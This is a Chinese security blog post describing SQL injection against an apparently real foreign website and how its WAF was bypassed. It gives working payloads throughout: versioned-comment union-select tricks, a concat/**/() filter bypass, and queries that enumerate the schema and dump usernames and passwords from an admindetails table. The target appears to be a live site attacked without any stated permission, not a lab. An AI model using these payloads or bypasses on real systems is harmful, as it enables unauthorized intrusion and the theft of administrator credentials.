实战sql注入绕过国外某waf

admin

139654
文章

114
评论

2022年5月12日23:58:32评论59 views字数 1466阅读4分53秒阅读模式

点击蓝字 / 关注我们

编者荐语：

以下文章来自夜组的LLBBB师傅，主要内容为实战sql注入绕过国外某waf，希望大家能够从中有所收获。NightCrawler安全团队诚邀各位共同学习，共同进步。

0x00：前言

偶然得到这个网站，发现有个waf，手生的我便尝试去绕一下。

0x01：发现注入点

1.1、页面正常显示

1.2、添加一个单引号

可以看到页面的回显完全不同了，因此此处大概率存在SQL注入。

0x02：查字段

实战sql注入绕过国外某waf

通过回显确定字段数为21

0x03：查看当前用户和数据库

union不被拦截：

实战sql注入绕过国外某waf

select也不被拦截：

实战sql注入绕过国外某waf

union和select一起被拦截：

实战sql注入绕过国外某waf

经测试发现常用的大小写，双写，尖括号，编码，脏数据等手段均无效，最终发现以下手段可以成功绕过：

/*!12345union*/ /*!select*//*!50000UniON SeLeCt*/

实战sql注入绕过国外某waf

查询到了用户和数据库：

?id=-1' /*!50000UniON SeLeCt*/ 1,user(),3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

实战sql注入绕过国外某waf

0x04：查表

发现group_concat不被拦截，圆括号也不被拦截，二者同时出现被拦截：

实战sql注入绕过国外某waf

使用group_concat/**/() 成功绕过

group_concat/**/()

但是发现group_concat()在这个站无法使用，于是决定使用concat()结合limit查数据。

查到了admindetails表：

?id=-1' /*!50000UniON SeLeCt*/ 1,concat/**/(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from information_schema.tables where table_schema=database() limit 4,10--+

实战sql注入绕过国外某waf

0x05：查列

-1' /*!50000UniON SeLeCt*/ 1,concat/**/(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from information_schema.columns where table_name='admindetails' limit 1,10--+

实战sql注入绕过国外某waf

最终查询到admindetails表的7个列：

UserNameID,userName,firstname,lastname,pass,type,status

0x06：爆数据

-1' /*!50000UniON SeLeCt*/ 1,concat/**/(UserNameID,':',userName,':',firstname,':',lastname,':',pass,':',type,':',status),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admindetails--+